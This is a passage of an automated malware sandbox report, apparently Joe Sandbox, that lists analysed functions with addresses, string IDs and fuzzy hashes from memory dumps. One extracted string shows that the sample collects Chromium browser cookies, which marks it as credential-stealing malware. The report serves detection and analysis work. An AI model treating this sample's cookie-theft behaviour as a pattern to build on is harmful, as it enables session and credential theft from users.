                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Q$s
                                                  • API String ID: 0-2866502837
                                                  • Opcode ID: a88c59f7b9168e3eefd8840bce1618e08afc8e9e54b4397441a188b7b0734d0e
                                                  • Instruction ID: 65ad57e70eb39342c1938dbaca158e085684d834fab2956c54bd558725bed7e4
                                                  • Opcode Fuzzy Hash: a88c59f7b9168e3eefd8840bce1618e08afc8e9e54b4397441a188b7b0734d0e
                                                  • Instruction Fuzzy Hash: 104158712187479BC728AF39E8851AAB3E2FBD5301F109A7CD9D6C71E1E6314506CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B69E60 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $(
                                                  • API String ID: 0-55695022
                                                  • Opcode ID: 16eb2c53822dbdd7c84a45b85c9809f9a6e10749c17f395cb93269309667b54a
                                                  • Instruction ID: 38f7663fe469d132bbf09d7e2f653bfedac0838536aa677e7df248d4a266f3c4
                                                  • Opcode Fuzzy Hash: 16eb2c53822dbdd7c84a45b85c9809f9a6e10749c17f395cb93269309667b54a
                                                  • Instruction Fuzzy Hash: 275178315087568BC718EF3DD8849ABB7E2FBC4324F258A3D8195C75D6E738811ACB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00BF40C6 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$q
                                                  • API String ID: 0-460854004
                                                  • Opcode ID: 668cc165656d80ec88e71bfbb8e27b0638ab3bbbb1bef3081c32e1dec20e2642
                                                  • Instruction ID: 31d60f6f1f06282bf6708922e607943aba8664d906bbce36f786170c5c86c0ee
                                                  • Opcode Fuzzy Hash: 668cc165656d80ec88e71bfbb8e27b0638ab3bbbb1bef3081c32e1dec20e2642
                                                  • Instruction Fuzzy Hash: 9D416536608702CBC718DB74E4905BAB3D2FBD9320F21867ED0AAC75C4E7759526CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00DA7392 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$N
                                                  • API String ID: 0-2781260954
                                                  • Opcode ID: b18618368f2765660f9d6bdc03538ae3870d0ec0c3c1bcd08669073b323fddb7
                                                  • Instruction ID: 678f0eb4a6c20f7466201ff129c782adc1a9ac5b9129a5bb6bf352c998d7174e
                                                  • Opcode Fuzzy Hash: b18618368f2765660f9d6bdc03538ae3870d0ec0c3c1bcd08669073b323fddb7
                                                  • Instruction Fuzzy Hash: 8A4169306082178BC319EB28C4914F7B3E3EBD9325B64C67ED4868B6D5DB74A40ACB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B940ED Relevance: 2.6, Strings: 2, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A$L
                                                  • API String ID: 0-10212088
                                                  • Opcode ID: 3d7d4c58fccb893e968da25640023facb3150ba82e6ad94a63b6a737f945d766
                                                  • Instruction ID: 5c309af3ff80ac3cb9e2a193db452ef2bd7903a4a4782515befbdd2729564d10
                                                  • Opcode Fuzzy Hash: 3d7d4c58fccb893e968da25640023facb3150ba82e6ad94a63b6a737f945d766
                                                  • Instruction Fuzzy Hash: 6D41DC7150871547DB08EB28D8825FB33E2EFC6311F518A3DE9A6C32D4EB79541A8710
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C89735 Relevance: 2.6, Strings: 2, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G$b
                                                  • API String ID: 0-3636503429
                                                  • Opcode ID: 2b87e7c24cda040bf43f3985f6fa19e861508a905ed6fc18b2f479d657fbed47
                                                  • Instruction ID: 3d6d03f3f1b79f48dd042674572290ac02fbdc0964943098702084f26b8e8869
                                                  • Opcode Fuzzy Hash: 2b87e7c24cda040bf43f3985f6fa19e861508a905ed6fc18b2f479d657fbed47
                                                  • Instruction Fuzzy Hash: B5418465118B5247D318AF3CE4505BBBBE5EBC6314F709A7CD0CAC2191EB29841ACB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B3D84A Relevance: 2.6, Strings: 2, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: '$J
                                                  • API String ID: 0-2778906719
                                                  • Opcode ID: 985ab91ed8bfdf7b105f3057f147248fae1d8fb402502c9f36da194aeec84831
                                                  • Instruction ID: 9e7222214a4e16a44d3bca771dffc2a8dffc1ee78f172f6a9a655982bb163d38
                                                  • Opcode Fuzzy Hash: 985ab91ed8bfdf7b105f3057f147248fae1d8fb402502c9f36da194aeec84831
                                                  • Instruction Fuzzy Hash: A331CE76528B5A9BD714EB39DCA44F6B3C2E7C6315B40D63CC4A2C3584DB36A21FD281
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CD88BB Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G$a
                                                  • API String ID: 0-1103753791
                                                  • Opcode ID: 0b5a48c5f4b62c1d02e754071ccfa3f8c57c8a84db15d5c1f5f8f8d6866508d6
                                                  • Instruction ID: d4183ab6029665c6fcdc0348f2de28e34906c16cb701995d4b568ef6866122b3
                                                  • Opcode Fuzzy Hash: 0b5a48c5f4b62c1d02e754071ccfa3f8c57c8a84db15d5c1f5f8f8d6866508d6
                                                  • Instruction Fuzzy Hash: 97419B7620C307CBD319DF18E4915BB73E2EBC4304F258A2ED9868B194E7B9201ECB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C38B67 Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Z$f
                                                  • API String ID: 0-3411236799
                                                  • Opcode ID: 7536f8ae6345145a70d0583018ae0016615c5cd94774f16f10412dc82b9a0b8f
                                                  • Instruction ID: 41159442a6a75211471418e50cffd6a83189a14404b30ce3dc300aa5c10cd23f
                                                  • Opcode Fuzzy Hash: 7536f8ae6345145a70d0583018ae0016615c5cd94774f16f10412dc82b9a0b8f
                                                  • Instruction Fuzzy Hash: 124167765083238BC32CEA68D8904AAB3E1EBD1320F24CB3D9996C76D4E7764516CE41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CB8CDD Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$<2
                                                  • API String ID: 0-4112355245
                                                  • Opcode ID: d56a7f14670ddfcee48c1da5fa766d78fa2db96fc3d8f5e5eca1d44356d8e1fe
                                                  • Instruction ID: 5c8caadd177094578e98c24d9310689384bf9e3fc6cb9d61d5061fb7c53ff336
                                                  • Opcode Fuzzy Hash: d56a7f14670ddfcee48c1da5fa766d78fa2db96fc3d8f5e5eca1d44356d8e1fe
                                                  • Instruction Fuzzy Hash: 43313A2460C76387D728AB2DD4A05AFF7E2EFD6300F64997E91C1876D1DB2A4027DB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0C798 Relevance: 2.1, Strings: 1, Instructions: 833COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • [info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 00B0C9D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: [info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                  • API String ID: 0-4202348984
                                                  • Opcode ID: 7cc59e0dd85535e98f573be283adff8f995550907de08f0c00eabd6a12b06f59
                                                  • Instruction ID: d566765894bf976f2f2166d210ca299017ec10a6f844db7ee5eae21b20f276a1
                                                  • Opcode Fuzzy Hash: 7cc59e0dd85535e98f573be283adff8f995550907de08f0c00eabd6a12b06f59
                                                  • Instruction Fuzzy Hash: BF528B71618341CFD314CF28D8A0B2ABBE2FF89314F69496CE59697391DB35E845CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E0D0F2 Relevance: 1.6, Strings: 1, Instructions: 352COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: l
                                                  • API String ID: 0-2517025534
                                                  • Opcode ID: b98eacb2568c7ce47cca6877814bca4629f8225207c3e4590e1d294093e68a84
                                                  • Instruction ID: 121c15f86acc1875b38a73a30bdce4a73c6a0f412cd79bb6384272b55906d962
                                                  • Opcode Fuzzy Hash: b98eacb2568c7ce47cca6877814bca4629f8225207c3e4590e1d294093e68a84
                                                  • Instruction Fuzzy Hash: A1B1EC32218A098FC718EF29D8C12FAB3E2FBD4301F548A2ED4D7C7155D735A91A8B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00BF4463 Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p
                                                  • API String ID: 0-2181537457
                                                  • Opcode ID: c472d31282e8119d296a24f0eb752c206f3cfb6cbfc6b0e6cd4b3992170051c4
                                                  • Instruction ID: 3faf26f6321eb175aca5e52a6841d4e1eedf085e09c4cab5ade65cd3725e0c61
                                                  • Opcode Fuzzy Hash: c472d31282e8119d296a24f0eb752c206f3cfb6cbfc6b0e6cd4b3992170051c4
                                                  • Instruction Fuzzy Hash: 73B188321087518BE718EF39D8815BBB7E2FFC1310F948A3EE596C7195DB3698068B42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B14AB3 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2PBp
                                                  • API String ID: 0-2240847165
                                                  • Opcode ID: f36f0d7be77a1c203317493c78e0c5714dff59f9dfd492c33dc6191779fd01ab
                                                  • Instruction ID: 2c999da087f0d26abef8402f82bdea3a457935d55cd6b84f325304845f3fcd89
                                                  • Opcode Fuzzy Hash: f36f0d7be77a1c203317493c78e0c5714dff59f9dfd492c33dc6191779fd01ab
                                                  • Instruction Fuzzy Hash: 7291F574109B808AC7398B3984907B7FBE2EF96305F68469DC4EB4B782D334A885CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C4C7FD Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3
                                                  • API String ID: 0-3085525640
                                                  • Opcode ID: 240d07aaa3df24d6e411cf404a722f6b463813b7c16cc622324312da2af4af51
                                                  • Instruction ID: 4c977f6d348f30c612cf2d40c3807b4057d8e74c15fccfdfcdda23a42c093f11
                                                  • Opcode Fuzzy Hash: 240d07aaa3df24d6e411cf404a722f6b463813b7c16cc622324312da2af4af51
                                                  • Instruction Fuzzy Hash: A281D731218B254BC718EF28E8954FBB3C6EBC5321F004B3ED59287581DB356406CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF6960 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,
                                                  • API String ID: 0-3772416878
                                                  • Opcode ID: b853bcf7575539b0aabd8c962141f0e452dec77aa13a1c011141f2dab79125a0
                                                  • Instruction ID: 0aa410d83aebf426dc7ac90dc8bb35d1a939e8573c1611b3f3f0a0abbeac19a0
                                                  • Opcode Fuzzy Hash: b853bcf7575539b0aabd8c962141f0e452dec77aa13a1c011141f2dab79125a0
                                                  • Instruction Fuzzy Hash: A2B14871109385AFD314CF68C98465AFBE0AFA9344F448A1DF5D897382D371EA28CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D52938 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !
                                                  • API String ID: 0-2657877971
                                                  • Opcode ID: e6d7bf6190f76a93e4ee86bd02ebc2d23cf2cee4c8cde3d537ef20f52172b995
                                                  • Instruction ID: 4d8563033b26e034398831bde9e9f9529f8fe21fef524e377fd6a7556ef4eb78
                                                  • Opcode Fuzzy Hash: e6d7bf6190f76a93e4ee86bd02ebc2d23cf2cee4c8cde3d537ef20f52172b995
                                                  • Instruction Fuzzy Hash: 6291C932628A1A8BC719EE78E8C15EBB3D3EBD1310F24873DD59AC7195EB354116CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00DEE4E4 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %
                                                  • API String ID: 0-2567322570
